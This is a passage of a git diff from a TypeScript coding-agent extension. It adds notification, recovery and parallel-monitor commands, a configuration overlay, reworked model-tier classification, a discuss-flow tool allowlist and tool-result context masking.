+}
+
+function formatTimestamp(ts: string): string {
+  try {
+    const d = new Date(ts);
+    return d.toLocaleString("en-US", { hour12: false, month: "short", day: "numeric", hour: "2-digit", minute: "2-digit" });
+  } catch {
+    return ts.slice(0, 19);
+  }
+}
+
+export async function handleNotificationsCommand(
+  args: string,
+  ctx: ExtensionCommandContext,
+  pi: ExtensionAPI,
+): Promise<boolean> {
+  // /gsd notifications clear
+  if (args === "clear") {
+    clearNotifications();
+    // Suppress persistence so the confirmation toast doesn't re-populate the store
+    suppressPersistence();
+    try {
+      ctx.ui.notify("All notifications cleared.", "success");
+    } finally {
+      unsuppressPersistence();
+    }
+    return true;
+  }
+
+  // /gsd notifications tail [N]
+  if (args === "tail" || args.startsWith("tail ")) {
+    const countStr = args.replace(/^tail\s*/, "").trim();
+    const count = countStr ? parseInt(countStr, 10) : 20;
+    const n = isNaN(count) || count < 1 ? 20 : Math.min(count, 100);
+    const entries = readNotifications().slice(0, n);
+
+    if (entries.length === 0) {
+      ctx.ui.notify("No notifications.", "info");
+      return true;
+    }
+
+    const lines = entries.map((e) =>
+      `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`,
+    );
+    ctx.ui.notify(`Last ${entries.length} notification(s):\n${lines.join("\n")}`, "info");
+    return true;
+  }
+
+  // /gsd notifications filter <severity>
+  if (args.startsWith("filter ")) {
+    const severity = args.replace(/^filter\s+/, "").trim().toLowerCase();
+    if (!["error", "warning", "info", "success"].includes(severity)) {
+      ctx.ui.notify("Usage: /gsd notifications filter <error|warning|info|success>", "warning");
+      return true;
+    }
+    const entries = readNotifications().filter((e) => e.severity === severity);
+
+    if (entries.length === 0) {
+      ctx.ui.notify(`No ${severity} notifications.`, "info");
+      return true;
+    }
+
+    const lines = entries.slice(0, 20).map((e) =>
+      `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`,
+    );
+    const suffix = entries.length > 20 ? `\n... and ${entries.length - 20} more` : "";
+    ctx.ui.notify(`${severity} notifications (${entries.length}):\n${lines.join("\n")}${suffix}`, "info");
+    return true;
+  }
+
+  // /gsd notifications (no args) — open overlay in TUI, or print summary
+  if (args === "" || args === "status") {
+    // Try overlay first (TUI mode)
+    if (ctx.hasUI) {
+      try {
+        await ctx.ui.custom<void>(
+          (tui, theme, _kb, done) => new GSDNotificationOverlay(tui, theme, () => done()),
+          {
+            overlay: true,
+            overlayOptions: {
+              width: "80%",
+              minWidth: 60,
+              maxHeight: "88%",
+              anchor: "center",
+              backdrop: true,
+            },
+          },
+        );
+        return true;
+      } catch {
+        // Fall through to text output if overlay fails
+      }
+    }
+
+    // Text fallback (RPC/headless mode)
+    const unread = getUnreadCount();
+    const entries = readNotifications().slice(0, 10);
+    if (entries.length === 0) {
+      ctx.ui.notify("No notifications.", "info");
+      return true;
+    }
+
+    const lines = entries.map((e) =>
+      `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`,
+    );
+    const header = unread > 0 ? `${unread} unread — ` : "";
+    ctx.ui.notify(`${header}Recent notifications:\n${lines.join("\n")}`, "info");
+    return true;
+  }
+
+  // Unknown subcommand
+  ctx.ui.notify(
+    "Usage: /gsd notifications [clear|tail [N]|filter <severity>]",
+    "warning",
+  );
+  return true;
+}
diff --git a/src/resources/extensions/gsd/commands/handlers/ops.ts b/src/resources/extensions/gsd/commands/handlers/ops.ts
index 763c434f3..532a4b4ec 100644
--- a/src/resources/extensions/gsd/commands/handlers/ops.ts
+++ b/src/resources/extensions/gsd/commands/handlers/ops.ts
@@ -6,7 +6,7 @@ import { handleConfig } from "../../commands-config.js";
 import { handleDoctor, handleCapture, handleKnowledge, handleRunHook, handleSkillHealth, handleSteer, handleTriage, handleUpdate } from "../../commands-handlers.js";
 import { handleInspect } from "../../commands-inspect.js";
 import { handleLogs } from "../../commands-logs.js";
-import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees } from "../../commands-maintenance.js";
+import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees, handleRecover } from "../../commands-maintenance.js";
 import { handleExport } from "../../export.js";
 import { handleHistory } from "../../history.js";
 import { handleUndo } from "../../undo.js";
@@ -53,6 +53,16 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon
     await handleHistory(trimmed.replace(/^history\s*/, "").trim(), ctx, projectRoot());
     return true;
   }
+  if (trimmed === "undo-task" || trimmed.startsWith("undo-task ")) {
+    const { handleUndoTask } = await import("../../undo.js");
+    await handleUndoTask(trimmed.replace(/^undo-task\s*/, "").trim(), ctx, pi, projectRoot());
+    return true;
+  }
+  if (trimmed === "reset-slice" || trimmed.startsWith("reset-slice ")) {
+    const { handleResetSlice } = await import("../../undo.js");
+    await handleResetSlice(trimmed.replace(/^reset-slice\s*/, "").trim(), ctx, pi, projectRoot());
+    return true;
+  }
   if (trimmed === "undo" || trimmed.startsWith("undo ")) {
     await handleUndo(trimmed.replace(/^undo\s*/, "").trim(), ctx, pi, projectRoot());
     return true;
@@ -65,6 +75,10 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon
     await handleSkip(trimmed.replace(/^skip\s*/, "").trim(), ctx, projectRoot());
     return true;
   }
+  if (trimmed === "recover") {
+    await handleRecover(ctx, projectRoot());
+    return true;
+  }
   if (trimmed === "export" || trimmed.startsWith("export ")) {
     await handleExport(trimmed.replace(/^export\s*/, "").trim(), ctx, projectRoot());
     return true;
@@ -164,6 +178,11 @@ Examples:
     await dispatchDirectPhase(ctx, pi, phase, projectRoot());
     return true;
   }
+  if (trimmed === "notifications" || trimmed.startsWith("notifications ")) {
+    const { handleNotificationsCommand } = await import("./notifications-handler.js");
+    await handleNotificationsCommand(trimmed.replace(/^notifications\s*/, "").trim(), ctx, pi);
+    return true;
+  }
   if (trimmed === "inspect") {
     await handleInspect(ctx);
     return true;
@@ -177,10 +196,25 @@ Examples:
     await handleFast(trimmed.replace(/^fast\s*/, "").trim(), ctx);
     return true;
   }
+  if (trimmed === "mcp" || trimmed.startsWith("mcp ")) {
+    const { handleMcpStatus } = await import("../../commands-mcp-status.js");
+    await handleMcpStatus(trimmed.replace(/^mcp\s*/, "").trim(), ctx);
+    return true;
+  }
   if (trimmed === "extensions" || trimmed.startsWith("extensions ")) {
     const { handleExtensions } = await import("../../commands-extensions.js");
     await handleExtensions(trimmed.replace(/^extensions\s*/, "").trim(), ctx);
     return true;
   }
+  if (trimmed === "rethink") {
+    const { handleRethink } = await import("../../rethink.js");
+    await handleRethink(trimmed, ctx, pi);
+    return true;
+  }
+  if (trimmed === "codebase" || trimmed.startsWith("codebase ")) {
+    const { handleCodebase } = await import("../../commands-codebase.js");
+    await handleCodebase(trimmed.replace(/^codebase\s*/, "").trim(), ctx, pi);
+    return true;
+  }
   return false;
 }
diff --git a/src/resources/extensions/gsd/commands/handlers/parallel.ts b/src/resources/extensions/gsd/commands/handlers/parallel.ts
index a2acb5367..bc8eea7da 100644
--- a/src/resources/extensions/gsd/commands/handlers/parallel.ts
+++ b/src/resources/extensions/gsd/commands/handlers/parallel.ts
@@ -63,7 +63,7 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm
     }
     const lines = ["# Parallel Workers\n"];
     for (const worker of workers) {
-      lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — ${worker.completedUnits} units — $${worker.cost.toFixed(2)}`);
+      lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — $${worker.cost.toFixed(2)}`);
     }
     const state = getOrchestratorState();
     if (state) {
@@ -111,7 +111,25 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm
     return true;
   }
 
-  emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". Usage: /gsd parallel [start|status|stop|pause|resume|merge]`);
+  if (subcommand === "watch") {
+    const root = projectRoot();
+    const { ParallelMonitorOverlay } = await import("../../parallel-monitor-overlay.js");
+    await _ctx.ui.custom<void>(
+      (tui, theme, _kb, done) => new ParallelMonitorOverlay(tui, theme, () => done(), root),
+      {
+        overlay: true,
+        overlayOptions: {
+          width: "90%",
+          minWidth: 80,
+          maxHeight: "92%",
+          anchor: "center",
+        },
+      },
+    );
+    return true;
+  }
+
+  emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". Usage: /gsd parallel [start|status|stop|pause|resume|merge|watch]`);
   return true;
 }
 
diff --git a/src/resources/extensions/gsd/commands/handlers/workflow.ts b/src/resources/extensions/gsd/commands/handlers/workflow.ts
index 9a0169931..10282fbcc 100644
--- a/src/resources/extensions/gsd/commands/handlers/workflow.ts
+++ b/src/resources/extensions/gsd/commands/handlers/workflow.ts
@@ -188,6 +188,14 @@ export async function handleWorkflowCommand(trimmed: string, ctx: ExtensionComma
     return true;
   }
   if (trimmed === "quick" || trimmed.startsWith("quick ")) {
+    if (isAutoActive()) {
+      ctx.ui.notify(
+        "/gsd quick cannot run while auto-mode is active.\n" +
+        "Stop auto-mode first with /gsd stop, then run /gsd quick.",
+        "error",
+      );
+      return true;
+    }
     await handleQuick(trimmed.replace(/^quick\s*/, "").trim(), ctx, pi);
     return true;
   }
diff --git a/src/resources/extensions/gsd/complexity-classifier.ts b/src/resources/extensions/gsd/complexity-classifier.ts
index 6e117cccd..82027227f 100644
--- a/src/resources/extensions/gsd/complexity-classifier.ts
+++ b/src/resources/extensions/gsd/complexity-classifier.ts
@@ -16,6 +16,7 @@ export interface ClassificationResult {
   tier: ComplexityTier;
   reason: string;
   downgraded: boolean;   // true if budget pressure lowered the tier
+  taskMetadata?: TaskMetadata;
 }
 
 export interface TaskMetadata {
@@ -35,14 +36,17 @@ const UNIT_TYPE_TIERS: Record<string, ComplexityTier> = {
   "complete-slice": "light",
   "run-uat": "light",
 
-  // Tier 2 — Standard: research, routine planning, discussion
+  // Tier 2 — Standard: research, routine discussion
   "discuss-milestone": "standard",
+  "discuss-slice": "standard",
   "research-milestone": "standard",
   "research-slice": "standard",
-  "plan-milestone": "standard",
-  "plan-slice": "standard",
 
-  // Tier 3 — Heavy: execution, replanning (requires deep reasoning)
+  // Tier 3 — Heavy: planning, execution, replanning (requires deep reasoning)
+  // Planning is heavy so it uses the best configured model (e.g. Opus) and is
+  // not downgraded by dynamic routing when a capable model is configured.
+  "plan-milestone": "heavy",
+  "plan-slice": "heavy",
   "execute-task": "standard",   // default standard, upgraded by metadata
   "replan-slice": "heavy",
   "reassess-roadmap": "heavy",
@@ -68,17 +72,20 @@ export function classifyUnitComplexity(
 ): ClassificationResult {
   // Hook units default to light
   if (unitType.startsWith("hook/")) {
-    const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false };
+    const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false, taskMetadata: undefined };
     return applyBudgetPressure(result, budgetPct);
   }
 
   // Start with the default tier for this unit type
   let tier = UNIT_TYPE_TIERS[unitType] ?? "standard";
   let reason = `unit type: ${unitType}`;
+  let taskMeta: TaskMetadata | undefined;
 
   // For execute-task, analyze task metadata for complexity signals
   if (unitType === "execute-task") {
-    const taskAnalysis = analyzeTaskComplexity(unitId, basePath, metadata);
+    // Extract metadata once and reuse throughout to avoid double-extraction
+    taskMeta = metadata ?? extractTaskMetadata(unitId, basePath);
+    const taskAnalysis = analyzeTaskComplexity(unitId, basePath, taskMeta);
     tier = taskAnalysis.tier;
     reason = taskAnalysis.reason;
   }
@@ -93,14 +100,15 @@ export function classifyUnitComplexity(
   }
 
   // Adaptive learning: check if history suggests bumping the tier
-  const tags = metadata?.tags ?? extractTaskMetadata(unitId, basePath).tags;
+  // Use already-extracted taskMeta.tags if available to avoid double-extraction
+  const tags = taskMeta?.tags ?? metadata?.tags;
   const adaptiveAdjustment = getAdaptiveTierAdjustment(unitType, tier, tags);
   if (adaptiveAdjustment && tierOrdinal(adaptiveAdjustment) > tierOrdinal(tier)) {
     reason = `${reason} (adaptive: high failure rate at ${tier})`;
     tier = adaptiveAdjustment;
   }
 
-  const result: ClassificationResult = { tier, reason, downgraded: false };
+  const result: ClassificationResult = { tier, reason, downgraded: false, taskMetadata: taskMeta };
   return applyBudgetPressure(result, budgetPct);
 }
 
@@ -184,8 +192,8 @@ function analyzePlanComplexity(
   // Check if this is a milestone-level plan (more complex) vs single slice
   const { milestone: mid, slice: sid } = parseUnitId(unitId);
   if (!sid) {
-    // Milestone-level planning is always at least standard
-    return { tier: "standard", reason: "milestone-level planning" };
+    // Milestone-level planning is always heavy — requires full context and best model
+    return { tier: "heavy", reason: "milestone-level planning" };
   }
 
   // For slice planning, try to read the context/research to gauge complexity
@@ -209,7 +217,7 @@ function analyzePlanComplexity(
 /**
  * Extract task metadata from the task plan file on disk.
  */
-function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata {
+export function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata {
   const meta: TaskMetadata = {};
   const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
   if (!mid || !sid || !tid) return meta;
diff --git a/src/resources/extensions/gsd/config-overlay.ts b/src/resources/extensions/gsd/config-overlay.ts
new file mode 100644
index 000000000..1b9cf2852
--- /dev/null
+++ b/src/resources/extensions/gsd/config-overlay.ts
@@ -0,0 +1,331 @@
+/**
+ * GSD Configuration Overlay
+ *
+ * Read-only TUI overlay showing the effective GSD configuration:
+ * token profile, model assignments, dynamic routing, git settings,
+ * budget, workflow toggles, and preference file sources.
+ * Opened via `/gsd show-config` or `/gsd config`.
+ */
+
+import type { Theme } from "@gsd/pi-coding-agent";
+import { matchesKey, Key, truncateToWidth } from "@gsd/pi-tui";
+
+import {
+  loadEffectiveGSDPreferences,
+  loadGlobalGSDPreferences,
+  loadProjectGSDPreferences,
+  getGlobalGSDPreferencesPath,
+  getProjectGSDPreferencesPath,
+  resolveDynamicRoutingConfig,
+  resolveEffectiveProfile,
+  resolveModelWithFallbacksForUnit,
+  resolveAutoSupervisorConfig,
+} from "./preferences.js";
+
+// ─── Data Collection ──────────────────────────────────────────────────────
+
+interface ConfigSection {
+  title: string;
+  rows: Array<{ label: string; value: string; accent?: boolean }>;
+}
+
+function collectConfigSections(): ConfigSection[] {
+  const sections: ConfigSection[] = [];
+
+  const globalPrefs = loadGlobalGSDPreferences();
+  const projectPrefs = loadProjectGSDPreferences();
+  const effective = loadEffectiveGSDPreferences();
+  const prefs = effective?.preferences;
+
+  // ─── Sources ─────────────────────────────────────────────────────────
+  sections.push({
+    title: "Sources",
+    rows: [
+      { label: "Global", value: globalPrefs ? globalPrefs.path : `(none) ${getGlobalGSDPreferencesPath()}` },
+      { label: "Project", value: projectPrefs ? projectPrefs.path : `(none) ${getProjectGSDPreferencesPath()}` },
+    ],
+  });
+
+  // ─── Profile ─────────────────────────────────────────────────────────
+  const profile = resolveEffectiveProfile();
+  const profileRows: ConfigSection["rows"] = [
+    { label: "Token profile", value: `${profile}${!prefs?.token_profile ? " (default)" : ""}`, accent: true },
+  ];
+  if (prefs?.mode) profileRows.push({ label: "Workflow mode", value: prefs.mode });
+  sections.push({ title: "Profile", rows: profileRows });
+
+  // ─── Models ──────────────────────────────────────────────────────────
+  const unitTypes: Array<[string, string]> = [
+    ["research", "research-milestone"],
+    ["planning", "plan-milestone"],
+    ["discuss", "discuss-milestone"],
+    ["execution", "execute-task"],
+    ["completion", "complete-slice"],
+    ["validation", "run-uat"],
+  ];
+
+  const modelRows: ConfigSection["rows"] = [];
+  for (const [label, unitType] of unitTypes) {
+    const resolved = resolveModelWithFallbacksForUnit(unitType);
+    if (resolved) {
+      let val = resolved.primary;
+      if (resolved.fallbacks.length > 0) {
+        val += ` \u2192 ${resolved.fallbacks.join(" \u2192 ")}`;
+      }
+      modelRows.push({ label, value: val });
+    } else {
+      modelRows.push({ label, value: "(inherit)" });
+    }
+  }
+
+  // subagent is a direct config key
+  const models = prefs?.models as Record<string, unknown> | undefined;
+  const subVal = models?.subagent;
+  if (subVal) {
+    const model = typeof subVal === "string" ? subVal : (subVal as { model?: string })?.model ?? "?";
+    modelRows.push({ label: "subagent", value: model });
+  } else {
+    modelRows.push({ label: "subagent", value: "(inherit)" });
+  }
+
+  sections.push({ title: "Models", rows: modelRows });
+
+  // ─── Dynamic Routing ─────────────────────────────────────────────────
+  const routing = resolveDynamicRoutingConfig();
+  const routingRows: ConfigSection["rows"] = [
+    { label: "Enabled", value: routing.enabled ? "yes" : "no", accent: routing.enabled },
+  ];
+  if (routing.enabled) {
+    routingRows.push({ label: "Escalate on fail", value: routing.escalate_on_failure !== false ? "yes" : "no" });
+    routingRows.push({ label: "Budget pressure", value: routing.budget_pressure !== false ? "yes" : "no" });
+    routingRows.push({ label: "Cross-provider", value: routing.cross_provider !== false ? "yes" : "no" });
+    if (routing.tier_models) {
+      const tm = routing.tier_models;
+      if (tm.light) routingRows.push({ label: "[L] light", value: tm.light });
+      if (tm.standard) routingRows.push({ label: "[S] standard", value: tm.standard });
+      if (tm.heavy) routingRows.push({ label: "[H] heavy", value: tm.heavy });
+    }
+  }
+  sections.push({ title: "Dynamic Routing", rows: routingRows });
+
+  // ─── Git ─────────────────────────────────────────────────────────────
+  if (prefs?.git) {
+    const g = prefs.git;
+    const gitRows: ConfigSection["rows"] = [];
+    if (g.isolation !== undefined) gitRows.push({ label: "Isolation", value: String(g.isolation) });
+    if (g.auto_push !== undefined) gitRows.push({ label: "Auto push", value: String(g.auto_push) });
+    if (g.push_branches !== undefined) gitRows.push({ label: "Push branches", value: String(g.push_branches) });
+    if (g.merge_strategy) gitRows.push({ label: "Merge strategy", value: g.merge_strategy });
+    if (g.main_branch) gitRows.push({ label: "Main branch", value: g.main_branch });
+    if (g.remote) gitRows.push({ label: "Remote", value: g.remote });
+    if (gitRows.length > 0) sections.push({ title: "Git", rows: gitRows });
+  }
+
+  // ─── Budget ──────────────────────────────────────────────────────────
+  if (prefs?.budget_ceiling !== undefined || prefs?.budget_enforcement) {
+    const budgetRows: ConfigSection["rows"] = [];
+    if (prefs.budget_ceiling !== undefined) budgetRows.push({ label: "Ceiling", value: `$${prefs.budget_ceiling}` });
+    if (prefs.budget_enforcement) budgetRows.push({ label: "Enforcement", value: String(prefs.budget_enforcement) });
+    sections.push({ title: "Budget", rows: budgetRows });
+  }
+
+  // ─── Auto Supervisor ─────────────────────────────────────────────────
+  if (prefs?.auto_supervisor) {
+    const sup = resolveAutoSupervisorConfig();
+    const supRows: ConfigSection["rows"] = [];
+    if (sup.model) supRows.push({ label: "Model", value: sup.model });
+    supRows.push({ label: "Soft timeout", value: `${sup.soft_timeout_minutes}m` });
+    supRows.push({ label: "Idle timeout", value: `${sup.idle_timeout_minutes}m` });
+    supRows.push({ label: "Hard timeout", value: `${sup.hard_timeout_minutes}m` });
+    sections.push({ title: "Auto Supervisor", rows: supRows });
+  }
+
+  // ─── Toggles ─────────────────────────────────────────────────────────
+  const toggleRows: ConfigSection["rows"] = [];
+  if (prefs?.phases) {
+    const p = prefs.phases;
+    if (p.skip_research) toggleRows.push({ label: "skip_research", value: "on" });
+    if (p.skip_reassess) toggleRows.push({ label: "skip_reassess", value: "on" });
+    if (p.skip_slice_research) toggleRows.push({ label: "skip_slice_research", value: "on" });
+    if (p.skip_milestone_validation) toggleRows.push({ label: "skip_milestone_validation", value: "on" });
+    if (p.require_slice_discussion) toggleRows.push({ label: "require_slice_discussion", value: "on" });
+  }
+  if (prefs?.uat_dispatch) toggleRows.push({ label: "uat_dispatch", value: "on" });
+  if (prefs?.auto_visualize) toggleRows.push({ label: "auto_visualize", value: "on" });
+  if (prefs?.auto_report === false) toggleRows.push({ label: "auto_report", value: "off" });
+  if (prefs?.show_token_cost) toggleRows.push({ label: "show_token_cost", value: "on" });
+  if (prefs?.forensics_dedup) toggleRows.push({ label: "forensics_dedup", value: "on" });
+  if (prefs?.unique_milestone_ids) toggleRows.push({ label: "unique_milestone_ids", value: "on" });
+  if (prefs?.service_tier) toggleRows.push({ label: "service_tier", value: prefs.service_tier });
+  if (prefs?.search_provider && prefs.search_provider !== "auto") toggleRows.push({ label: "search_provider", value: prefs.search_provider });
+  if (prefs?.context_selection) toggleRows.push({ label: "context_selection", value: prefs.context_selection });
+  if (prefs?.widget_mode && prefs.widget_mode !== "full") toggleRows.push({ label: "widget_mode", value: prefs.widget_mode });
+  if (prefs?.experimental?.rtk) toggleRows.push({ label: "experimental.rtk", value: "on" });
+  if (toggleRows.length > 0) sections.push({ title: "Toggles", rows: toggleRows });
+
+  // ─── Parallel ────────────────────────────────────────────────────────
+  if (prefs?.parallel) {
+    const pc = prefs.parallel;
+    const parallelRows: ConfigSection["rows"] = [];
+    if (pc.max_workers !== undefined) parallelRows.push({ label: "Max workers", value: String(pc.max_workers) });
+    if (pc.merge_strategy) parallelRows.push({ label: "Merge strategy", value: pc.merge_strategy });
+    if (pc.auto_merge) parallelRows.push({ label: "Auto merge", value: pc.auto_merge });
+    if (parallelRows.length > 0) sections.push({ title: "Parallel", rows: parallelRows });
+  }
+
+  // ─── Hooks ───────────────────────────────────────────────────────────
+  const postHooks = prefs?.post_unit_hooks?.filter(h => h.enabled !== false) ?? [];
+  const preHooks = prefs?.pre_dispatch_hooks?.filter(h => h.enabled !== false) ?? [];
+  if (postHooks.length > 0 || preHooks.length > 0) {
+    const hookRows: ConfigSection["rows"] = [];
+    if (preHooks.length > 0) hookRows.push({ label: "Pre-dispatch", value: `${preHooks.length} active` });
+    if (postHooks.length > 0) hookRows.push({ label: "Post-unit", value: `${postHooks.length} active` });
+    sections.push({ title: "Hooks", rows: hookRows });
+  }
+
+  // ─── Warnings ────────────────────────────────────────────────────────
+  const warnings = [
+    ...(globalPrefs?.warnings ?? []),
+    ...(projectPrefs?.warnings ?? []),
+  ];
+  if (warnings.length > 0) {
+    sections.push({
+      title: "Warnings",
+      rows: warnings.map(w => ({ label: "\u26a0", value: w })),
+    });
+  }
+
+  return sections;
+}
+
+// ─── Plain Text Formatter (headless/RPC fallback) ─────────────────────────
+
+export function formatConfigText(): string {
+  const sections = collectConfigSections();
+  const lines: string[] = ["GSD Configuration\n"];
+
+  let maxLabel = 0;
+  for (const section of sections) {
+    for (const row of section.rows) {
+      if (row.label.length > maxLabel) maxLabel = row.label.length;
+    }
+  }
+  const pad = Math.min(maxLabel + 2, 24);
+
+  for (const section of sections) {
+    lines.push("");
+    lines.push(section.title.toUpperCase());
+    for (const row of section.rows) {
+      lines.push(`  ${row.label.padEnd(pad)}${row.value}`);
+    }
+  }
+
+  return lines.join("\n");
+}
+
+// ─── Overlay Class ────────────────────────────────────────────────────────
+
+export class GSDConfigOverlay {
+  private tui: { requestRender: () => void };
+  private theme: Theme;
+  private onClose: () => void;
+  private sections: ConfigSection[];
+  private cachedLines?: string[];
+  private scrollOffset = 0;
+  private disposed = false;
+
+  constructor(
+    tui: { requestRender: () => void },
+    theme: Theme,
+    onClose: () => void,
+  ) {
+    this.tui = tui;
+    this.theme = theme;
+    this.onClose = onClose;
+    this.sections = collectConfigSections();
+  }
+
+  invalidate(): void {
+    this.cachedLines = undefined;
+  }
+
+  dispose(): void {
+    this.disposed = true;
+  }
+
+  handleInput(data: string): void {
+    if (matchesKey(data, Key.escape) || data === "q") {
+      this.dispose();
+      this.onClose();
+      return;
+    }
+    if (matchesKey(data, Key.down) || data === "j") {
+      this.scrollOffset++;
+      this.cachedLines = undefined;
+      this.tui.requestRender();
+      return;
+    }
+    if (matchesKey(data, Key.up) || data === "k") {
+      this.scrollOffset = Math.max(0, this.scrollOffset - 1);
+      this.cachedLines = undefined;
+      this.tui.requestRender();
+      return;
+    }
+    if (matchesKey(data, Key.pageDown)) {
+      this.scrollOffset += 10;
+      this.cachedLines = undefined;
+      this.tui.requestRender();
+      return;
+    }
+    if (matchesKey(data, Key.pageUp)) {
+      this.scrollOffset = Math.max(0, this.scrollOffset - 10);
+      this.cachedLines = undefined;
+      this.tui.requestRender();
+      return;
+    }
+  }
+
+  render(width: number): string[] {
+    if (this.cachedLines) return this.cachedLines;
+
+    const t = this.theme;
+    const w = Math.max(width, 50);
+    const allLines: string[] = [];
+
+    // Header
+    allLines.push(t.bold(t.fg("accent", " GSD Configuration ")));
+    allLines.push(t.fg("muted", "\u2500".repeat(w)));
+
+    // Find max label width for alignment
+    let maxLabel = 0;
+    for (const section of this.sections) {
+      for (const row of section.rows) {
+        if (row.label.length > maxLabel) maxLabel = row.label.length;
+      }
+    }
+    const labelPad = Math.min(maxLabel + 2, 24);
+
+    for (const section of this.sections) {
+      allLines.push("");
+      allLines.push(t.bold(t.fg("accent", `  ${section.title}`)));
+
+      for (const row of section.rows) {
+        const label = t.fg("muted", `    ${row.label.padEnd(labelPad)}`);
+        const value = row.accent ? t.bold(row.value) : row.value;
+        allLines.push(truncateToWidth(`${label}${value}`, w));
+      }
+    }
+
+    allLines.push("");
+    allLines.push(t.fg("muted", `  ${"\u2500".repeat(w - 4)}`));
+    allLines.push(t.fg("muted", "  esc/q close  \u2502  \u2191\u2193/jk scroll  \u2502  /gsd prefs to edit"));
+
+    // Apply scroll
+    const maxScroll = Math.max(0, allLines.length - 20);
+    this.scrollOffset = Math.min(this.scrollOffset, maxScroll);
+    const visible = allLines.slice(this.scrollOffset);
+
+    this.cachedLines = visible;
+    return visible;
+  }
+}
diff --git a/src/resources/extensions/gsd/constants.ts b/src/resources/extensions/gsd/constants.ts
index 636f2d808..15812dc93 100644
--- a/src/resources/extensions/gsd/constants.ts
+++ b/src/resources/extensions/gsd/constants.ts
@@ -19,3 +19,47 @@ export const DIR_CACHE_MAX = 200;
 
 /** Max parse-cache entries before eviction. */
 export const CACHE_MAX = 50;
+
+// ─── Tool Scoping ─────────────────────────────────────────────────────────────
+
+/**
+ * GSD tools allowed during discuss flows (#2949).
+ *
+ * xAI/Grok (and potentially other providers with grammar-based constrained
+ * decoding) return "Grammar is too complex" (HTTP 400) when the combined
+ * tool schemas exceed their internal grammar limit. The full GSD tool set
+ * registers ~33 tools with deeply nested schemas; discuss flows only need
+ * a small subset.
+ *
+ * By scoping tools to this allowlist during discuss dispatches, the grammar
+ * sent to the provider stays well under provider limits.
+ *
+ * Included tools and why:
+ *   - gsd_summary_save: writes CONTEXT.md artifacts (all discuss prompts)
+ *   - gsd_save_summary: alias for above
+ *   - gsd_decision_save: records decisions (discuss.md output phase)
+ *   - gsd_save_decision: alias for above
+ *   - gsd_plan_milestone: writes roadmap (discuss.md single/multi milestone)
+ *   - gsd_milestone_plan: alias for above
+ *   - gsd_milestone_generate_id: generates milestone IDs (discuss.md multi-milestone)
+ *   - gsd_generate_milestone_id: alias for above
+ *   - gsd_requirement_update: updates requirements during discuss
+ *   - gsd_update_requirement: alias for above
+ */
+export const DISCUSS_TOOLS_ALLOWLIST: readonly string[] = [
+  // Context / summary writing
+  "gsd_summary_save",
+  "gsd_save_summary",
+  // Decision recording
+  "gsd_decision_save",
+  "gsd_save_decision",
+  // Milestone planning (needed for discuss.md output phase)
+  "gsd_plan_milestone",
+  "gsd_milestone_plan",
+  // Milestone ID generation (multi-milestone flow)
+  "gsd_milestone_generate_id",
+  "gsd_generate_milestone_id",
+  // Requirement updates
+  "gsd_requirement_update",
+  "gsd_update_requirement",
+];
diff --git a/src/resources/extensions/gsd/context-masker.ts b/src/resources/extensions/gsd/context-masker.ts
new file mode 100644
index 000000000..824c3a91e
--- /dev/null
+++ b/src/resources/extensions/gsd/context-masker.ts
@@ -0,0 +1,74 @@
+/**
+ * Observation masking for GSD auto-mode sessions.
+ *
+ * Replaces tool result content older than N turns with a placeholder.
+ * Reduces context bloat between compactions with zero LLM overhead.
+ * Preserves message ordering, roles, and all assistant/user messages.
+ *
+ * Operates on the pi-ai Message[] format (post-convertToLlm, pre-provider):
+ *   - toolResult messages: { role: "toolResult", content: TextContent[] }
+ *   - bash results are already converted to: { role: "user", content: [{type:"text",text:"..."}] }
+ *     and start with "Ran `" from bashExecutionToText.
+ */
+
+interface MaskableMessage {
+  role: string;
+  content: unknown;
+  type?: string;
+  [key: string]: unknown;
+}
+
+const MASK_PLACEHOLDER = "[result masked — within summarized history]";
+const MASK_CONTENT_BLOCK = [{ type: "text" as const, text: MASK_PLACEHOLDER }];
+
+function findTurnBoundary(messages: MaskableMessage[], keepRecentTurns: number): number {
+  let turnsSeen = 0;
+  for (let i = messages.length - 1; i >= 0; i--) {
+    const m = messages[i];
+    // In the LLM payload, genuine user turns have role "user".
+    // Tool results have role "toolResult" and are excluded by this check.
+    if (m.role === "user") {
+      // Skip bash-result user messages (converted from bashExecution) — these aren't real user turns
+      if (isBashResultUserMessage(m)) continue;
+      turnsSeen++;
+      if (turnsSeen >= keepRecentTurns) return i;
+    }
+  }
+  return 0;
+}
+
+/**
+ * Detect user messages that originated from bashExecution.
+ * After convertToLlm, these are {role: "user", content: [{type:"text", text:"Ran `cmd`\n..."}]}.
+ * The bashExecutionToText format always starts with "Ran `".
+ */
+function isBashResultUserMessage(m: MaskableMessage): boolean {
+  if (m.role !== "user" || !Array.isArray(m.content)) return false;
+  const first = m.content[0];
+  return first && typeof first === "object" && "text" in first &&
+    typeof first.text === "string" && first.text.startsWith("Ran `");
+}
+
+function isMaskableMessage(m: MaskableMessage): boolean {
+  // Tool result messages (role: "toolResult" in pi-ai format)
+  if (m.role === "toolResult") return true;
+  // Bash-result user messages (converted from bashExecution by convertToLlm)
+  if (isBashResultUserMessage(m)) return true;
+  return false;
+}
+
+export function createObservationMask(keepRecentTurns: number = 8) {
+  return (messages: MaskableMessage[]): MaskableMessage[] => {
+    const boundary = findTurnBoundary(messages, keepRecentTurns);
+    if (boundary === 0) return messages;
+
+    return messages.map((m, i) => {
+      if (i >= boundary) return m;
+      if (isMaskableMessage(m)) {
